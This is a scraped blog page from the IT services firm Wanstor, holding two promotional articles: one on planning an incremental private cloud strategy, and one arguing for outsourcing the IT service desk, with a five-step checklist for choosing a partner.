While your ultimate goal might be to bring platform as a service (PaaS) and software as a service (SaaS) architectures so you can leverage a larger set of hybrid cloud capabilities, such as anytime, anywhere access for your customers built on a unified set of compute, network, and storage resources, your near-term focus in the context of an infrastructure as a service (IaaS) model may just be in moving the dial specifically on automated provisioning and de-provisioning of resources. It’s in this approach, by making deliberate, incremental progress in the service of a longer-term strategy that real IT transformation occurs on a private cloud model.

The way forward is to recognise that changing to a functional private cloud model is an evolutionary process, where the investments you make in technology solutions must be evenly matched at each step by the maturity of your business in managing them. Your strategy must be carefully applied in those areas where your business is likely to benefit most. Indeed, not all capabilities of a private cloud need to be, or should be exploited.

The real task lies in balancing the potential goods of a private cloud solution against actual business needs, understanding your capabilities and limitations at each stage of the process, and putting a plan in place that charts a realistic, achievable course of action for getting it done.

The objectives you choose for your private cloud will raise a number of questions about the various technical and organisational implications of implementing your solution. Below are some examples of the kinds of questions IT Managers need to be able to ask in order to frame a comprehensive and realistic strategy for achieving private cloud objectives.

Self-service – Do you want to allow your users to provision the resources they need on-demand without human intervention? How much control should you relinquish? What are the potential consequences of offering a self-service model for common tasks? Will cloud computing be left unchecked and unused if individual users can select their own licences and usage limits, if so how much money will this cost the business, if accounts are left unused?

Usage-based – Pay-per-service, or “chargeback,” is one of the hallmarks of cloud computing, and if your private cloud strategy includes driving greater transparency of costs for better resource planning, you need to know the incentives you are trying to drive. Are you trying to reward good behaviour and punish bad? Do you wish to push more round-the-clock workloads to night time operations for power savings that support your company’s environmental initiatives?

Elasticity – Being able to respond efficiently to fluctuations in resource usage can represent a major selling point for cloud computing. It is important to consider first whether you really need a sophisticated system of automated provisioning and de-provisioning of servers to deal with fluctuations in demand. If significant and relatively unpredictable, then this capability may be appropriate. If the need is regular and predictable, straightforward automation may be sufficient for your purposes. Other questions you need to ask: Which applications are priorities, and which can be pushed back in terms of priorities?

Pooled resources – Consolidating resources to save on infrastructure, platform, and/or software costs is a common goal for large-scale IT operations. If you’re in a medium/large business with several independent departments potentially with their own IT operations, you are likely to encounter critical questions of process: E.g. Will independent groups deal with the inherent limitations of shared infrastructure and services? Will standardised configurations come at the cost of the optimised systems to which they’ve grown accustomed? As you move forward in the process of pooling your resources to get the benefits, you need to be aware of the likely trade-offs in putting everyone on a standard set of services. It may well be worth the cost to the business as a whole, but it may not seem that way to those who lose capabilities or levels of service to which they’ve been accustomed.

Comprehensive network access – As you move out from behind the business firewall and away from tightly controlled client configurations and network access scenarios, there are several important considerations that will need to inform your strategy, beyond the obvious concerns over security, such as the nature and extent of supportability: What kinds of personal devices will you support and to what degree? How will mobile clients (smartphones, operating systems and tablets) access network resources, and will you have the right levels of bandwidth to service them? What forms of authentication will you support?

Whatever objectives you are aiming to achieve, the important point to note is that building a private cloud is a process for which there are numerous tactical and strategic considerations. A successful private cloud implementation relies on the ability to think through all facets of the undertaking, clearly understanding the dependencies, trade-offs, limitations, and opportunities of any particular strategy. The reality for most businesses is that an incremental private cloud strategy is the only realistic path, given the technical and organisational complexity of current IT operations which exist as the business has invested large sums of money into them over a period of time.

Expectations and realities of cloud computing in a business IT context can prove a challenge to resolve. Many IT leaders understand why an incremental approach is needed, but those outside IT, are less clear about the real implications of implementing a cloud solution. The right strategy for achieving private cloud objectives must also include an appropriate communications strategy for setting and managing expectations for the business as a whole. With the whole business informed, from the board room to the front office, the hard work of defining and executing on your private cloud strategy is far more likely to achieve its objectives and set your business on the path to long-term success in the cloud.

For more information about Wanstor’s private cloud services click here.

Read More

Reasons why business leaders need to consider outsourcing their IT service desk to a specialist provider

14th December 2017
|

Service Desk Operatives smiling

At Wanstor we have recently been talking to a number of existing and potential customers about their IT service desk support. Our discussions have highlighted a number of major trends which IT departments and business leaders were not aware of putting pressure on IT service desk resources. For example:

  • Employees are more mobile than ever before, meaning things break at different locations
  • Employees attitudes to work are changing from a place where you go, to something you do as and when required
  • Different business departments wanting access to cloud services
  • More and more applications are being developed and used in day to day business
  • Data management becoming a serious headache as employees and customers demand access to it 24/7
  • More and more devices being used – leading to security and patch management issues in terms of the right levels of resourcing and making sure users are safe at all times from potential attacks
  • New technology and new devices are being launched all the time – What is the best way to offer support?
  • Growing operational costs of supporting a sprawling mixed vendor IT infrastructure
  • End users complaining about the time it takes to solve issues through the IT service desk

Traditional IT help desks used to service the business during opening hours and at fixed locations, however this is no longer good enough. IT support staff are now required to be multi skilled across a range of technologies and provide support to staff at different locations 24/7.

As business technology has become increasingly complex, the need for dedicated IT support services has grown. Typically the IT help desk has provided end users with little more than basic trouble shooting and issue management services. In the past when technology was made by only a few manufacturers, staff could easily be trained and appear knowledgeable about computers and IT infrastructure. However as business has become more reliant on technology, a standardised and documented helpdesk approach is needed, one which offers a consistent set of services and protocols for help desk staff. Over the past decade, IT help desk staff have started to become hindered by the sheer speed at which enterprise technology has evolved. There are a number of trends that have made it increasingly difficult for traditional IT help desks to provide the kinds of support that end users need:

These trends include:

  • Improvements in users personal IT has changed perceptions and expectations of what IT can help them with in their working lives. The user experience of smartphones and laptops is significantly better than even 5 years ago. What’s more, many of the leading technology providers provide consumers with a high standard of customer service (Just think of the apple store). So, when they call up their company’s IT service desk, they quickly become frustrated by untrained staff, staff who do not keep lines of communication open or inefficient processes which they have to go through to get a simple problem fixed.
  • Most of the modern workforce have been using advanced technology for the majority of their lives. Many employees are now capable of resolving minor troubleshooting problems and are also used to looking for answers online through search engines. Quite often, the IT help desk is a last resort for more complex problems, meaning IT help desk staff must be prepared to resolve more difficult issues.
  • As technology has evolved users are using a variety of software and applications in their business lives. Today, the typical business will be using 100’s of applications, with staff constantly connecting to the network with different kinds of personal and mobile devices. Expecting the service desk to monitor and support this complexity alone is problematic, as every user has a different IT need in terms of software and applications.
  • Employees want to work when they want to not when they are told to. This change in mindset with regards to work alongside the widespread acceptance of cloud technology and mobile devices, means business users are now able to access company content from their smartphones or laptops at any hour of the day. Most of the time this is hugely beneficial to the user and the company, allowing workers to be productive whilst out of the office. However, when they have problems logging onto the system, or syncing a document to their device, they need support instantly. When an IT help desk is closed at weekends or after 5pm, the service simply does not match up to user and business requirements.
  • More pressure is being placed on IT helpdesks. Staff turnover is constant as many internal IT helpdesk staff simply cannot cope with the demands being made of them. The HDI regularly states that the staff turnover rate on IT service desks is as high as 40% with many staff who do not leave complaining of stress and stress related illnesses. Such a high staff turnover means internal IT service desks often have extremely large training bills as they are constantly struggle to train and retain skilled staff members alongside many positions remaining unfilled.

The issues identified above have led many businesses to explore alternatives to the traditional in-house IT support approach. At Wanstor we believe the aim is not to replace the talent firms already have. Rather, the goal should be to extend and enhance in-house IT staff, by letting them focus their attention on high value strategic activities, whilst using a mix of outsourced staff and technology to support wider business and IT goals for highly intensive administration tasks.

At Wanstor we believe by enhancing internal IT services teams with improved help desk technology and outsourced IT service desk teams for high volume/admin heavy tasks, businesses can fill the skills, cost and user satisfaction gaps which exist and achieve the best possible ROI from their technology. The main reasons many business leaders are talking to Wanstor about outsourcing their IT helpdesks are:

Improved communication – Focussed on the specific needs of the business and end users

Training – Outsourced IT service desk staff specialise in providing customer support for a wide range of technologies. This means that they are trained with the latest versions of software solutions. They can also be trained to help with a business’s specific technology set up.

Cost savings – Many IT outsourcing companies provide contracts that give businesses the option to only pay for the services they need and use. An internal IT service desk is a fixed cost in terms of people and technology which needs to be provided even when the business does not require large volumes of IT support. By moving to a pay as you go IT service model, it has been proven through many extensive studies that operational costs of IT service desks can be cut by over 20% in many cases.

Outsourcing part of your IT support service will only be successful if the solution and partner you choose aligns with the specific needs of your business. It is essential that business and IT decision makers develop a plan of requirements and expectations before they engage with an IT partner. By taking the time at the outset to decide what the business actually needs from an IT support partner you can decide on whether you are looking for a partner to resolve repetitive problems like resetting passwords, or are looking for a close partnership where your IT help desk is fully supported by an external team and best in class technology.

At Wanstor we recommend all businesses do 5 things before they engage with and decide on an outsourced IT service desk partnership. They are:

  • Discuss what is going wrong with your existing IT helpdesk team and see if there are any process or people improvements which could be made to alleviate pressure and improve the service required back to the business
  • Interview a selection of end users and find out what they want/expect from an IT service desk and then evaluate if you already have the skills/capabilities to satisfy those user demands or if you definitely need some help
  • Have a vision of what you want the IT service desk to look like. Can you provide that vision with internal staff or do you need expert outside help to reach your IT and business goals. If you do want external IT support what does your ideal IT partner look like and what services should they provide?
  • Engage with a partner who can support your vision and has the expertise and experience to turn it into reality. Your partner should be able to advise you on what is realistic, and you should expect them to be able to guide you to a degree.
  • Set KPIs to judge whether your partnership is successful, it is highly valuable to measure progress. Conduct regular customer satisfaction surveys to find out whether your business users are now happier with the service they are receiving.

In summary, the traditional IT help desk model is redundant. Business technology has moved on and is still moving through its various lifecycles at a real pace. As a result, traditional IT help desks are simply unable to cope with the increased demands being placed on them. At Wanstor we believe the future IT service desk model is a hybrid one. One which uses internal IT teams for strategic high value IT programmes of work and an external provider who can look after all of the operational IT demands from users such as patching, password re-sets, application updates and making sure the right security is in place. Get the internal/external IT service provider mix right and your business could benefit from access to highly trained staff as and when it needs them, lower operational costs and improved end user satisfaction levels.

To find out more about Wanstor’s vision of the IT service desk of the future download our whitepaper here.

Read More
Wanstor
124-126 Borough High Street London, SE1 1LB
Phone: 0333 123 0360, 020 7592 7860
IT Support London from Wanstor IT Support London